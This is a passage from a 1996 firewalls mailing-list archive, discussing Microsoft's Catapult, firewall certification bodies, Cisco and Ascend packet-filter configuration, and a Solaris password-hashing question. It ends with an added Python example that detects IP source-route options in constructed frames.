Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I pulled down Microsoft's page on Catapult. I urge you all to do so and give it a read. From where I sit, it looks like the firewall market has reached its next level, with this announcement.

The brief on Microsoft's page is completely content-free. Several times, Catapult is recommended as the solution because it's secure. Nothing about why it's secure or how it's secure. Don't bother your head with that stuff! It's SECURE, OK? ...Or at least as secure as a beta product that only runs on a beta version of NT can be.

In fairness to Microsoft, it may be pretty good stuff. But we can't tell from what they say. Which is why I feel it marks a milestone in the firewall market.
The Big Boys Are Here now and it's SECURE, it's OK. That argument worked for Netscape, for a while.

Those of us who've been with this firewall thing for a while have seen the market get muddied before, and eventually things calm down again. It'll be fascinating to see what happens if Microsoft decides to put even a teeny bit of their marketing muscle behind Catapult. I guess it means that, as a technology, firewalls have "arrived."

mjr.

From firewalls-owner Mon Jul 1 19:04:04 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA24852 for firewalls-outgoing; Mon, 1 Jul 1996 18:19:42 -0700 (PDT)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id SAA24842 for firewalls@greatcircle.com; Mon, 1 Jul 1996 18:19:38 -0700 (PDT)
Received: from hippo.ru.ac.za (hippo.ru.ac.za [146.231.128.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id BAA12959 for ; Sun, 30 Jun 1996 01:23:11 -0700 (PDT)
Received: by hippo.ru.ac.za (Smail3.1.29.1 #1)
Message-Id:
From: ccfj@hippo.ru.ac.za (F. Jacot Guillarmod)
Subject: Help with cisco access list?
To: firewalls@greatcircle.com
Date: Sun, 30 Jun 1996 10:20:16 +0200 (GMT+0200)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

A query on Cisco access lists...

I've had a set of access lists configured and working for a while now, but the manual maintenance has become a bit confusing, so I've set up the acl-examples perl scripts by Paul Traina available from ftp.cisco.com, and am trying to use them in conjunction with other tools we use to automate the maintenance of our DNS.

It looks like most of the chickens mentioned in the Chapman paper on IP packet filtering have come home to roost in a big way. The manual lists, which still work OK, probably work because they're next to useless.
The automated lists generated by the "netsec" perl script have tightened things up so much that I'm forced to admit to being confused about parts of what I'm trying to achieve and how to achieve it. A search through what literature is available to me didn't bring up a whole lot of practical info on setting up access lists, so I'd be grateful for any further pointers or examples (other than those in the Cisco manuals, which tend to be somewhat ....).

Anyway, here's the scenario: We have a 2514 running 10.0 and are using all 4 interfaces. Being a university, it's assumed brainpower is more plentiful than money in achieving workable solutions. We try.

  ISP #1 + Internet            ISP #2 + Regional net
 --------------------         ---------------------
          |                             |
          |                             |
        --------------------------------
        |  s0                      s1  |
        |                              |
        |  e0                      e1  |
        --------------------------------
          |                             |
          |                             |
 --------------------         ---------------------
  Admin subnet                 Everyone else subnets
  A.B.16.0/255.255.248.0       A.B.128.0/255.255.248.0
                               A.B.64.0
                               A.B.192.0 etc

The access lists for ether 1 are pretty standard and straightforward, as are those for serial 0 and serial 1 (which are currently identical). i.e. in isolation they work just fine and I understand them.

The awkward one is the access list for ether 0, which contains admin telnet and print servers plus a large number of workstations. The type of access needed here is:

Out onto ether 0:
  a  Telnet from selected hosts outside of A.B.16.0 but inside A.B.0.0
  b  FTP from selected hosts outside of A.B.16.0 but inside A.B.0.0
  c  Printing from hosts outside of A.B.16.0 but inside A.B.0.0
  d  "Established" tcp services, such as WWW etc from anywhere.

Out onto ether 1:
  e  Printing from hosts in A.B.16.0 but nowhere else
  f  Bootp from workstations within A.B.16.0 but nowhere else
  g  The "usual" paranoid stuff, excluding UDP other than port 53.

I've got most of this working, except for items c and e, printing using the BSD print spooler, which does things I can't grasp.
So, to get past this misunderstanding, I've thrown caution to the winds and tried permitting all UDP between ether 0 and ether 1 but I still can't print anything.

Can anyone point me in the right direction? Or explain what on earth lpr/lpd get up to when they start exchanging packets? Is there anything else to worry about (within reason) accessing admin type networks?

Many thanks,
--
F.F. Jacot Guillarmod - Computing Services - Rhodes University - Grahamstown
Internet: ccfj@hippo.ru.ac.za   Phone: +27 461 318284   Fax: +27 461 25049
The views expressed above are not necessarily those of Rhodes University

From firewalls-owner Mon Jul 1 19:21:48 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA24733 for firewalls-outgoing; Mon, 1 Jul 1996 18:18:43 -0700 (PDT)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id SAA24707 for firewalls@greatcircle.com; Mon, 1 Jul 1996 18:18:31 -0700 (PDT)
Received: from typhoon.dial.pipex.net (typhoon.dial.pipex.net [158.43.128.46]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA22873 for ; Sat, 29 Jun 1996 04:13:00 -0700 (PDT)
Received: from unknown by typhoon.dial.pipex.net (8.7.4/)
Message-ID:
In-Reply-To:
References: Conversation with last message
To: firewalls@GreatCircle.COM
MIME-Version: 1.0
From: Ian Johnstone-Bryden
Subject: Re: NCSA Certification
Date: Sat, 29 Jun 96 12:23:14 GMT
Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Corey wrote:
> To all:
>
> I think some important questions need to be asked:
>
> 1. Who appointed the NCSA as the proper body to approve firewalls?
>
> 2. Do people realize that in order to be approved, a vendor must be a
> member of the NCSA?
>
> 3. Do people realize that the first vendors approved were all members of
> the NCSA and as such got a timing advantage over other non-members?
>
> 4.
> Is it fair that all vendors, irrespective of size, must first pay a
> $22,000 membership fee?
>
> 5. Will the NCSA put a footnote on their "approved" list that only those
> vendors willing to pay $22,000 have received the NCSA's approval?
>
> 6. Doesn't the "bundled" concept of membership and qualification for
> approval render the whole process meaningless?
>
> 7. Have any members of NCSA not been approved?
>
> 8. What is NCSA doing with the funds received by its members? Is NCSA a
> non-profit organization?
>
> I believe all of these questions need to be addressed before the NCSA holds
> itself out as the self-appointed arbiter of firewall quality assurance.
>
> Just one man's opinion
>

All very good questions. As most subscribers to this list will be well aware, we were not short of evaluation bodies in the first place. So far no one has come up with a perfect evaluation system and probably never will, so it comes down to deciding what risks each buyer is prepared to take.

TCSEC/'Orange Book'

NCSC still evaluates product in the national (US) interest. The evaluation has been free to the vendor but it still costs a great deal of money. The vendor has to hire a VSA who has passed the NCSC VSA training and examination system. Considerable work has to be done during an evaluation to provide the system (hardware and software) and deal with the questions and give the presentations necessary to support the NCSC evaluators. The benefit of an NCSC certificate is that NCSC does not evaluate in the vendors' interests and is a government controlled and funded agency specifically established to be independent of vendor interest.

The risks of NCSC evaluation are several:

1. The process is slow and this means that the product is becoming obsolete by the time the evaluation is complete.

2. The RAMP (rating maintenance programme) is also slow and cumbersome so that the product available for delivery with a certificate is much older than the latest version in vendor development.

3.
The evaluation primarily covers assurance and not integrity or availability.

4. The evaluation and certificate covers a system down to fine detail like printer cables and much of that hardware will no longer be standard production by the time the evaluation is complete.

5. The vendor jacks up the product price to reflect the cost of development and evaluation support and because the product enjoys some monopoly or quasi-monopoly status through rarity of certificates.

6. TCSEC uses an incorrect model for the development processes employed by vendors.

7. Rainbow Series is based strongly on Mil-Std 2167A which assumes a detailed customer specification and custom engineering to meet that specification.

8. The system doesn't allow for sub-system certification other than you can have an evaluation which results in a D level ticket which is also issued to failed products.

9. Even today an NCSC evaluated product may not be available to all users, even inside the US. End-user certificates may still be required before legal shipment.

ITSEC

European Governments recognised the weaknesses and strengths of the US process and 4 countries worked together to produce ITSEC. ITSEC has several benefits over the US NCSC system:

1. Any number of Commercial Licensed Evaluation Facilities can be licensed. The UK ITSEC Scheme Body has already licensed 8 CLEFs (2 are US owned subsidiaries). The German ITSEC Scheme Body is planning to license additional CLEFs, possibly up to 120. France is planning to introduce a CLEF system with somewhere between the UK and German licensing numbers. That removes a major delay cause present in the US system where NCSC just doesn't have the manpower to handle even the relatively small number of products in the queue.

2. ITSEC certificates in the UK and Germany are mutually recognised by an agreement between the 2 national schemes and other countries are due to sign agreements this year in Europe and other areas.

3. Any vendor can present product for evaluation.
4. Any user can buy certified product - not just specialised government agencies.

5. ITSEC measures Integrity and Availability as well as measuring Assurance.

6. Software testing can be generic. Therefore a firewall mounted on an Intel-based platform and a specific trusted OS can be certified as meeting a particular TOE on any Intel platform which has a certified OS.

ITSEC also has risks:

1. The CLEFs do not issue licenses, only evaluation reports. Certification is by the government run national ITSEC Scheme Bodies. Therefore the system is only as good as the policing by the Scheme Bodies who are able to place export and distribution controls on some products.

2. Although ITSEC is significantly faster than the NCSC system, it's still slow and still leads to obsolete product.

3. Generic platform certificates for software do introduce risk because clone hardware may have vulnerabilities which were not present in the model and manufacture of the hardware supplied as a base for evaluation (this also applies to any platform component like the OS).

4. CLEF evaluation fees can be extortionate. ***BEFORE a CLEF objects to that statement, I would qualify it. A small product which takes one month to develop and document for evaluation can take a year to evaluate at a high day rate. Charges are proportionately more realistic as the product complexity increases.

5. There is not an established formal RAMP system and review of new versions can be erratic across a number of products.

6. Some vendors with very good products cannot justify evaluation costs and therefore a certified product is not necessarily the best solution available. That's particularly true as long as ITSEC evaluations are in Europe and much product development is somewhere else. A vendor (for example a US vendor) who has perhaps 20 years experience of providing trusted solutions and who has already had successful NCSC evaluations still has to undergo a development assurance inspection.
If he happens to be based in a pleasant geographic area, some CLEFs may feel that it's necessary to send a small team over for several weeks to review design processes, staying in the best hotels and charging a high day rate. This is still not a proportionally high cost, provided that the vendor is submitting many products over a period, because the inspection is for once only. That may be another risk because the vendor might not employ the same methods later on.

Common Criteria

This has yet to go into full operation and so the effects are potentially unknown. However, it is based heavily on ITSEC so it is reasonable to expect similar benefits and risks. Provided many countries sign mutual acceptance and evaluation agreements like the ITSEC agreements, CC will really become the international system. The main risk may then be that not every Scheme Body may really work as agreed and national interests may intrude. ITSEC for example lost several benefits and introduced extra risk because Europe tried very hard to accommodate the national interests of other countries in an attempt to develop a true ISO style international criteria.

Self Certification

Vendors will offer self certified and 'designed to meet' products. Some vendors may be very correct and open while others will offer only a marketing view of product achievements. Potentially this is very high risk unless the vendor claims are nailed down firmly in the procurement document and you can afford to take them through the courts if necessary. Even then it's still risky.

Self Evaluation with Test Suites

US NIST and UK NPL have both offered dial-in test suite facilities including C2 test suites. I don't believe either service has attracted many vendors and probably the benefits over self certification are minimal. There are a growing number of test suites available for network security and some of these could be used by vendors and customers alike.
That does of course assume that both are capable of driving them and being honest about the results. There is also the question of how up to date and effective the test suites are. Like penetration testing, the result may mean something or nothing.

Reality of systems

In the end, product testing is only a small part of the total equation in risk management. When TCSEC and ITSEC were established, there were two goals:

1. Force vendors to present adequately documented product with identified Security Targets.
2. Make project procurement easier by removing some unnecessary risks.

Neither system is a destination for governments; the destination is accreditation and enforcement. Unfortunately, buying certified product to build a system doesn't mean the system achieves the same level, and vulnerabilities can be introduced during integration and implementation. Accreditation doesn't work unless you first produce a detailed risk policy to provide something against which you can measure vulnerabilities and decide which vulnerabilities have to be removed and which are acceptable risks for YOUR business. Accreditation means very little unless you have the means to enforce your risk policy. There are no short cuts.

As far as NCSA Certification goes, only experience will show if it's worth anything. Any trade club is vulnerable to vested interest and all the certificate might show is that a particular vendor has paid the membership fee. OTOH it can be a huge benefit to the first vendors to join because it provides their marketeers with something else to hype their products. That advantage reduces as more vendors join the club and might become worthless if some products with certificates are shown later to have severe vulnerabilities.

Ian J-B.
From firewalls-owner Mon Jul 1 19:58:43 1996
From: vadillo@apu.rcp.net.pe (Enrique Vadillo)
Subject: /etc/shadow encryption
To: firewalls@GreatCircle.COM
Date: Mon, 1 Jul 1996 21:25:45 -0400 (EDT)

Hello all!

I would like to know if you know where I can get the encryption algorithm that Sun Solaris 2.5 uses to write its /etc/shadow file.

I am trying to write some proggy that can let me create users thru email, I have so many by day!! I want to make this an automated process, and all I need now is to know the way this encryption is made.
Thanks in advance,
--
Enrique Vadillo                 Research & Development at RCP
http://www.rcp.net.pe           fax : +51 1 241-1320
Peruvian Internet Gateway       work: +51 1 954-4799

From firewalls-owner Mon Jul 1 20:19:01 1996
From: Russ
To: "Firewalls@GreatCircle.COM"
Subject: RE: Catapault firewall
Date: Mon, 1 Jul 1996 22:59:00 -0400
Message-ID: <01BB67A0.E5768A40@rwcooper.rc.toronto.on.ca>

Marcus, as always your wit is fine tuned...;-]

In fairness to Microsoft, the Catapult download includes over 600kb of HTML documentation explaining, in more detail than most would expect, how it, and the Remote Winsock Service, work. The marketing dribble in the press release is definitely targeted at non-techno Purchasing Managers, certainly not security folks.

Whether or not it actually represents a "new age" in Firewalls is going to be completely dependent on its actual security, and its cost:

- First, it has to work according to the documentation; if it doesn't, or can't be proven, then it should be spurned like any other half-baked piece of code.
- If it's priced competitively with other products (like Raptor or Firewall-1), then I doubt it will be broadly accepted; people will just continue to buy their complete package from security companies. OTOH, if it's cheap, then it may be the foundation on which other products are added. This could represent something new, and significant. Particularly if you get wide acceptance of PPTP.
Anyway, back to my testing...;-]

Cheers,
Russ

From firewalls-owner Mon Jul 1 20:34:04 1996
From: "Marcus J. Ranum"
Subject: firewall certification (was Re: NCSA)
To: firewalls@greatcircle.com
Date: Mon, 1 Jul 1996 21:27:45 -0400 (EDT)
Reply-To: mjr@v-one.com
Organization: V-One Corporation, Baltimore, MD
Office Phone: 410-889-8569
Message-Id: <199607020127.VAA26749@explorer2.clark.net>

[This is no longer particularly related to NCSA, so it should not be taken as criticism or praise for their business.]

I'm very cynical about the whole notion of firewall certification, as many of you have noted. Mostly, it's because it's nearly impossible to find an unbiased source. For example, the federal government's various agencies have several times tried to publish firewall recommendations but whenever they do, they get slammed and threatened with lawsuits by the vendors that feel they are slighted. There are probably all kinds of goofy procurement rules that further tie the hands of government agencies, with respect to making comments. NSA, for example, has spent a lot of effort looking at firewalls.
I know this for a fact, and I'm doubly frustrated by the fact that they don't say much. On one hand, it's about unclassified stuff, and WE PAID FOR IT - but - I suspect that the hassle they'd get from the vendors simply isn't worth it. I was involved in one case where NSA looked at a firewall that I built, but I was never formally told the results because they were CLASSIFIED. Hell, don't tell the author!

NCSA's situation is different: they have customers who are paying them for a service. As with any service providing business, there's a transfer of power of position along with the transfer of money. I believe that with firewalls, NCSA's stated plan was to start with fairly basic tests that verified a reasonably simple baseline, and then to "raise the bar" over time. They certainly could not set the bar too high right away or they'd scare their customers (the vendors) off. I can accept that some of what NCSA's doing has value, by interpreting it as an extended marketing effort by the vendors, with NCSA as a mouthpiece that makes sure the claims aren't too egregious. That's a *START*. A tiny one.

To do product reviews, I believe the only people who are qualified are the ones who are beholden to none, and who have a history (in theory) of resisting censorship. By that, I mean The Fourth Estate. Unfortunately, from the quality of a few of the firewall evaluations, it is clear that not all members of the press take their responsibility very seriously: I've seen firewall "reviews" that crib marketing copy verbatim.

I continue to advocate that people EDUCATE THEMSELVES rather than take someone else's opinion in someone else's evaluation. It is foolishness to think of a firewall as an isolated "black box" that you can somehow test in a clean lab, then plug into your WAN and get security. Security is not about "black boxes"; it is a PROCESS that requires UNDERSTANDING and COMMITMENT from management.

Many of you (including the guys at NCSA who I've discussed this with!)
sense a great deal of ambivalence on my part about their efforts. In one sense I think it is a step forward; in another I think it's a step backward. On one hand we may see some sanity in marketing claims, and on the other, we may see people abrogate their responsibility to THINK about what they are doing when they see a sticker on a firewall.

Obviously, they are going to continue to move forward with their project - let's watch and see what happens. The best thing we can contribute is healthy, productive skepticism, and our support* if it looks like they're playing honestly.

mjr.

(* Oddly enough, I've contributed some effort pro bono to the NCSA project. They've adopted my firewall functional summaries format. I think that's a good thing, but time will tell!)
--
Chief Scientist, V-ONE Corporation -- "Security for a connected world"
work      http://www.v-one.com
personal  http://www.clark.net/pub/mjr/mjr-top.html

From firewalls-owner Mon Jul 1 21:19:18 1996
From: girsch@marben.com (Arnaud Girsch)
Subject: Re: /etc/shadow encryption
To: vadillo@apu.rcp.net.pe (Enrique Vadillo)
Cc: firewalls@GreatCircle.COM
Date: Mon, 1 Jul 1996 21:03:40 -0700 (PDT)
Message-Id: <199607020403.VAA19025@mail.marben.com>
In-Reply-To: from "Enrique Vadillo" at Jul 1, 96 09:25:45 pm
X-Organization: Marben Products, Inc.
> I would like to know if you know where I can get the encryption algorithm
> that Sun Solaris 2.5 uses to write its /etc/shadow file.
>
> I am trying to write some proggy that can let me create users thru email,
> I have so many by day!! I want to make this an automated process,
> and all I need now is to know the way this encryption is made.

If that's really what you want to do, you don't need the algorithm, but just have a look at crypt(3) on all (?) Un*x systems.

Arnaud.
--
Arnaud Girsch -+- agirsch@marben.com -+- Marben Products, Inc. - San Jose, CA

From firewalls-owner Mon Jul 1 22:19:12 1996
From: Mike Shaver
Subject: Re: Stateful Packet Screens
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Cc: firewalls@greatcircle.com
Date: Tue, 2 Jul 1996 01:00:55 -0400 (EDT)
Message-Id: <199607020500.BAA04053@neon.ingenia.com>
In-Reply-To: <9607012013.AA21329@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jul 1, 96 01:13:23 pm

Thus spake Ryan Russell/SYBASE:
> This is because, by their nature, many of them store a significant portion
> of the document on its way through, and hence, would make it easier to run
> through some script on the
> proxy server.

I don't think that's necessarily `by their nature', although I'll concede that the vast majority of AGs deal with data with larger granularity than the vast majority of SPFs.

> This would also be why they would
> tend to be slower.

I think it's because of:
- kernel->user->kernel data copying, since most AGs run in user space.
- doing more complex analysis/manipulation of the data, which obviously takes more CPU time. (This includes the AG's TCP, if any.)

> I suspect that one will have a much
> easier time
> allowing a new type of service on a SPF than an AG.

Warning: ports are not always related to services/protocols in a 1-to-1 way. Current SPFs only really look at port and protocol info, so you can easily end up letting something through that wasn't intended, if the port->application mapping isn't what you think it is.

> Are there proxies that are as transparent as something like FW1?

You can make a transparent proxy (which is probably closer to an AG than an SPF, by traditional behavioural criteria) which requires no change to the client configuration. Usually requires kernel support, I think.

Mike
--
#> Mike Shaver (shaver@ingenia.com)   Ingenia Communications Corporation <#
#> UNIX medicine man -- dark magick, cheap!                               <#
#>                                                                        <#
#> When the going gets tough, the tough give cryptic error messages.      <#
#> "We believe in rough consensus and running code."
<#

From firewalls-owner Tue Jul 2 02:04:08 1996
From: Darren Reed
Subject: Re: Stateful Packet Screens
To: shaver@neon.ingenia.ca (Mike Shaver)
Cc: Ryan.Russell@sybase.com, firewalls@GreatCircle.COM
Date: Tue, 2 Jul 1996 18:54:52 +1000 (EST)
Message-Id: <199607020857.BAA28063@miles.greatcircle.com>
In-Reply-To: <199607020500.BAA04053@neon.ingenia.com> from "Mike Shaver" at Jul 2, 96 01:00:55 am

In some mail from Mike Shaver, sie said:
>
> Thus spake Ryan Russell/SYBASE:
> > This is because, by their nature, many of them store a significant portion
> > of the document on its way through, and hence, would make it easier to run
> > through some script on the proxy server.
>
> I don't think that's necessarily `by their nature', although I'll
> concede that the vast majority of AGs deal with data with larger
> granularity than the vast majority of SPFs.

Dealing with a 1MB e-mail is going to be difficult, in kernel space.

> > This would also be why they would
> > tend to be slower.
>
> I think it's because of:
> - kernel->user->kernel data copying, since most AGs run in user space.
> - doing more complex analysis/manipulation of the data, which
>   obviously takes more CPU time. (This includes the AG's TCP, if any.)

I think the latter more than the first (re. zero-copy TCP at Usenix '96 having noticeable, but not huge, performance gains), especially if they're putting stuff on disk (I guess virtual memory must be a consideration here too).
> Warning: ports are not always related to services/protocols in a
> 1-to-1 way. Current SPFs only really look at port and protocol info,
> so you can easily end up letting something through that wasn't
> intended, if the port->application mapping isn't what you think it is.

FW-1 is a bit more advanced: it snoops RPC traffic and learns about RPC services that way rather than from any configuration file.

Darren

From firewalls-owner Tue Jul 2 02:34:03 1996
From: Darren Reed
Subject: Re: firewall certification (was Re: NCSA)
To: mjr@v-one.com
Cc: firewalls@GreatCircle.COM
Date: Tue, 2 Jul 1996 18:47:34 +1000 (EST)
Message-Id: <199607020850.BAA27791@miles.greatcircle.com>
In-Reply-To: <199607020127.VAA26749@explorer2.clark.net> from "Marcus J. Ranum" at Jul 1, 96 09:27:45 pm

In some mail from Marcus J. Ranum, sie said:
>
> [This is no longer particularly related to NCSA, so it
> should not be taken as criticism or praise for their business.]
>
> I'm very cynical about the whole notion of firewall
> certification, as many of you have noted. Mostly, it's because
> it's nearly impossible to find an unbiased source. For example,
> the federal government's various agencies have several times
> tried to publish firewall recommendations but whenever they
> do, they get slammed and threatened with lawsuits by the
> vendors that feel they are slighted. There are probably all
> kinds of goofy procurement rules that further tie the hands
> of government agencies, with respect to making comments.
[...]
On the topic of Government recommendations, the Australian Government has a "Firewall Requirements" document (a copy of which is hopefully going to get to me some time this century), which I think is an interesting way of approaching the "is it good enough?" problem.

What's more, I seem to get rather interesting advertising material from a local reseller of ISS's scanner which points out that a number of commercial firms which do auditing and consulting use it to verify or audit firewalls. Whilst it is a start, it is by no means comprehensive and, reading the document, the way it is sold for such a purpose borders on the ridiculous. It can quite easily lead to a false sense of security, irrespective of how up-to-date it is with current patches and bugs. How secure the firewall itself is does not necessarily have anything to do with how well it protects your network.

Darren

From firewalls-owner Tue Jul 2 03:04:02 1996
From: Michel Lavondes
To: vadillo@apu.rcp.net.pe (Enrique Vadillo)
Cc: firewalls@greatcircle.com
Subject: Re: /etc/shadow encryption
Date: Tue, 02 Jul 1996 11:45:40 +0100
Message-Id: <9607020945.AA17027@tidtest.total.fr>
In-Reply-To: Your message of "Mon, 01 Jul 1996 21:25:45 EDT."
X-Cuse: "The dog ate my network"

In message , Enrique Vadillo writes:
>
> I am trying to write some proggy that can let me create users thru email,
> I have so many by day!!
> I want to make this an automated process,
> and all I need now is to know the way this encryption is made.
>

Will you post the mailbot address on the list when you're done? :-)

Michel Lavondes (lavondes@tidtest.total.fr)
#include
Governments are guilty until proved innocent

From firewalls-owner Tue Jul 2 03:19:04 1996
From: sameer@wiproge.med.ge.com (Sameer )
To: firewalls@GreatCircle.COM, vadillo@apu.rcp.net.pe
Subject: Re: /etc/shadow encryption
Date: Tue, 2 Jul 1996 15:28:36 -0500
Message-Id: <199607022028.PAA19968@wiproge.med.ge.com>

Hi,

Why do u need the passwd algo for that? Solaris allows u to create a user w/o passwd and then let the user create passwd while logging.

....sam

*SAM*From firewalls-owner@GreatCircle.COM Tue Jul 2 09:26:19 1996
*SAM*From: vadillo@apu.rcp.net.pe (Enrique Vadillo)
*SAM*Subject: /etc/shadow encryption
*SAM*To: firewalls@GreatCircle.COM
*SAM*Date: Mon, 1 Jul 1996 21:25:45 -0400 (EDT)
*SAM*
*SAM*Hello all!
*SAM*
*SAM*I would like to know if you know where I can get the encryption algorithm
*SAM*that Sun Solaris 2.5 uses to write its /etc/shadow file.
*SAM*
*SAM*I am trying to write some proggy that can let me create users thru email,
*SAM*I have so many by day!! I want to make this an automated process,
*SAM*and all I need now is to know the way this encryption is made.
*SAM*
*SAM*Thanks in advance,
*SAM*--
*SAM* Enrique Vadillo                 Research & Development at RCP
*SAM* http://www.rcp.net.pe           fax : +51 1 241-1320
*SAM* Peruvian Internet Gateway       work: +51 1 954-4799
*SAM*

From firewalls-owner Tue Jul 2 05:49:14 1996
From: Charles C Fry
To: Firewalls@GreatCircle.COM
Subject: On Guard Experiences?
Date: Tue, 02 Jul 1996 08:37:48 +0100
Message-Id: <2.2.32.19960702073748.002bfdb0@CFConsulting.com>

I am looking for some feedback (good and bad) on the firewall called On Guard. Users who have it fw'ing IPX nets would be appreciated as well as folks using it for Internet firewalling.

Thanks.
======================================================================
= Charles Fry Consulting     == Helping Retail & Direct Marketing    =
= New Albany, Ohio           == Companies Harness Technology for     =
= (614) 855-3925             == Greater Profit and Market Advantage  =
= cfry@CFConsulting.com      == http://www.CFConsulting.com          =
======================================================================

From firewalls-owner Tue Jul 2 06:34:36 1996
From: gunni@if.is (Gunnar Ingvi Thorisson)
Subject: Reading news via a firewall
To: firewalls@GreatCircle.com
Date: Tue, 2 Jul 1996 13:17:04 +0000 (GMT)
Message-Id: <199607021317.NAA10567@linda.if.is>

I'm looking for a simple solution for reading news via a firewall. I've a Linux firewall set up on our local network and a lot of PCs running Win 3.x, Win95 and/or WinNT Workstations on the protected network. The problem is that the machines on the protected network must be able to read news via/through the firewall at the news host. Is there a simple/good solution for a Linux firewall? A gateway or something? If so, what news agents do support that gateway solution?

Hope someone can help me, best regards,
Gunni

.------.
| News |
`------'
    |
    |
---Firewall---
    |
    |
    `-------------Protected network

=========================================================================
Gunnar Ingvi Thorisson           E-Mail address: gunni@if.is
System administrator             Iceland Software Inc.
Sudurlandsbraut 4, IS-108 Reykjavík, Iceland
Phone: (+354) 588-1511           Fax: (+354) 588-8728
=========================================================================

From firewalls-owner Tue Jul 2 06:49:18 1996
From: Gary Wong/Ascend/US
To: Full Name Field
Cc: firewalls
Subject: Re: source routing and Ascend P50
Date: 2 Jul 96 6:22:20
Message-Id: <9607021322.AA1707@Mail-gw.ascend.com>

Frank :

The filter rules are as below :

Input Filter 1 : Generic...
  Forward = No
  Offset = 34
  Length = 1
  Mask = FF00000000000000
  Value = 8300000000000000     #loose source route
  Compare = Equals
  More = No

Input Filter 1 : Generic...
  Forward = No
  Offset = 34
  Length = 1
  Mask = FF00000000000000
  Value = 8900000000000000     #strict source route
  Compare = Equals
  More = No

These filters will discard incoming packets with the source route option (ex: traceroute -g or traceroute -G).

Gary Wong
Ascend Communications Inc.
-------------------------------------------------------------------------------------------------------------
wall @ readybox.com (Full Name Field)    06/30/96 10:14 AM

To:      firewalls @ GreatCircle.COM @ Internet
cc:
Subject: source routing and Ascend P50

I have an Ascend Pipeline 50 router and would like to kill all incoming source-routed packets.

1) Is it possible to filter source-routed packets with a P50?
2) If so, can anyone provide an example of such a filter rule?

I've spent some time on the phone with Ascend in an attempt to answer these questions. In that hunt, I spoke with four support people, none of whom were familiar with the concept of source routing. (That was, in itself, a little disturbing.) I tried to explain what source routing was and why it was of interest, but I never did get any useful responses.

---------------------------
Frank McCormick

From firewalls-owner Tue Jul 2 07:38:12 1996
From: David Tate
Organization: On Technology
To: firewalls@greatcircle.com
Subject: Training???
Date: Tue, 2 Jul 1996 10:20:00 -0500

I am looking for IS Security/Firewalling/Network Protection training in MA, in the month of July. Would anyone be able to recommend such training?
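Gary Wong's Ascend filter rules above match one byte at frame offset 34 against 0x83 and 0x89. The following is an added example, not from the posting and not Ascend code, that performs that same single-byte comparison and, beside it, walks the full IP options list; it assumes untagged Ethernet II framing (14-byte Ethernet header plus a 20-byte IPv4 header, which is what makes offset 34 the first options byte) and uses constructed frames.

```python
"""
Added example (not from the list posting and not Ascend code): parse the IP
options of a raw Ethernet II / IPv4 frame and flag the two source-route
options that the Ascend "Generic" filter matches on (Offset = 34,
Length = 1, Mask = FF, Value = 83 or 89).  Offset 34 is the first IP options
byte when the frame is untagged Ethernet II (14 bytes) followed by a 20-byte
IPv4 header; this example assumes that framing.
"""
import struct

ETH_HDR_LEN = 14                   # untagged Ethernet II header
IPV4_FIXED_LEN = 20                # IPv4 header without options
OPT_EOL, OPT_NOP = 0x00, 0x01      # single-byte options (RFC 791)
OPT_LSRR, OPT_SSRR = 0x83, 0x89    # the two values used in the Ascend filter
SOURCE_ROUTE_OPTS = {OPT_LSRR: "loose source route", OPT_SSRR: "strict source route"}


def ascend_filter_matches(frame: bytes) -> bool:
    """The rule as posted: compare the single byte at frame offset 34 to 0x83 / 0x89."""
    return len(frame) > 34 and frame[34] in SOURCE_ROUTE_OPTS


def ipv4_options(frame: bytes) -> bytes:
    """Return the IPv4 options bytes of an Ethernet II frame (empty if there are none)."""
    if len(frame) < ETH_HDR_LEN + IPV4_FIXED_LEN:
        raise ValueError("frame too short for an IPv4 header")
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[ETH_HDR_LEN:]
    version, ihl = ip[0] >> 4, (ip[0] & 0x0F) * 4
    if version != 4 or ihl < IPV4_FIXED_LEN or len(ip) < ihl:
        raise ValueError("malformed IPv4 header")
    return ip[IPV4_FIXED_LEN:ihl]


def source_route_options(frame: bytes) -> list:
    """Walk the whole option list (not just the first byte) and name any source-route options."""
    found = []
    opts = ipv4_options(frame)
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == OPT_EOL:
            break
        if kind == OPT_NOP:            # NOP has no length byte
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("truncated option")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")
        if kind in SOURCE_ROUTE_OPTS:
            found.append(SOURCE_ROUTE_OPTS[kind])
        i += length
    return found


def build_frame(options: bytes) -> bytes:
    """Constructed test input: minimal Ethernet II + IPv4 header carrying `options`."""
    padded = options + b"\x00" * (-len(options) % 4)   # pad to a 32-bit boundary with EOL
    ihl = (IPV4_FIXED_LEN + len(padded)) // 4
    ip_header = struct.pack("!BBHHHBBH4s4s",
                            (4 << 4) | ihl, 0, ihl * 4, 0, 0, 64, 6, 0,
                            bytes([10, 0, 0, 1]), bytes([192, 0, 2, 1])) + padded
    return b"\x00" * 12 + b"\x08\x00" + ip_header    # zero MACs, EtherType 0x0800


if __name__ == "__main__":
    # Constructed frames: no options, LSRR as the first option, and SSRR behind a NOP.
    route = bytes([192, 0, 2, 10])
    for label, opts in [("no options", b""),
                        ("LSRR first", bytes([OPT_LSRR, 7, 4]) + route),
                        ("NOP then SSRR", bytes([OPT_NOP, OPT_SSRR, 7, 4]) + route)]:
        frame = build_frame(opts)
        print(f"{label:14} offset-34 rule: {ascend_filter_matches(frame)!s:5} "
              f"full walk: {source_route_options(frame)}")
```

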